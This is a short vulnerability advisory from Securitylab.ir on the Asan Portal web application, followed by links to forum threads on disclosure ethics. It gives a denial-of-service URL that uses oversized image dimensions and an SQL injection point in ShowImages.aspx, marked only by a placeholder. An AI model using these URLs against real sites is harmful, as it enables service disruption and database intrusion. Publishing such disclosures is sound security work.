Asan Portal (IdehPardaz) Multiple Vulnerabilities



#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Asan Portal
# Vendor: http://iptech.ir/default.aspx?id=130
#################################################################
Vulnerability:

######################
# Denial of Service:
######################
http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000
With setting of large values of width and height it's possible to create large load at the server.

######################
# SQL Injection:
######################
http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75

#################################################################
# Discoverd By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###################################################################



Relevant Pages

  • RE: Disclosure of vulns and its legal aspects...
    ... website they would probably thank you, this is not the case with the larger ... Disclosure of vulns and its legal aspects... ... After detecting the aforementioned vulnerability i was, ... write the vendor the typical "praxis" e-mail saying that there MIGHT ...
    (Pen-Test)
  • RE: Disclosure of vulns and its legal aspects...
    ... website they would probably thank you, this is not the case with the larger ... Disclosure of vulns and its legal aspects... ... After detecting the aforementioned vulnerability i was, ... write the vendor the typical "praxis" e-mail saying that there MIGHT ...
    (Security-Basics)
  • Disclosure of vulns and its legal aspects...
    ... After detecting the aforementioned vulnerability i was, ... itself was on it's website... ... write the vendor the typical "praxis" e-mail saying that there MIGHT ... Second thought, if the vendor says yes, i will report them the ...
    (Pen-Test)
  • Disclosure of vulns and its legal aspects...
    ... After detecting the aforementioned vulnerability i was, ... itself was on it's website... ... write the vendor the typical "praxis" e-mail saying that there MIGHT ... Second thought, if the vendor says yes, i will report them the ...
    (Security-Basics)
  • RE: Disclosure of vulns and its legal aspects...
    ... After detecting the aforementioned vulnerability i was, ... itself was on it's website... ... write the vendor the typical "praxis" e-mail saying that there MIGHT ... Second thought, if the vendor says yes, i will report them the ...
    (Security-Basics)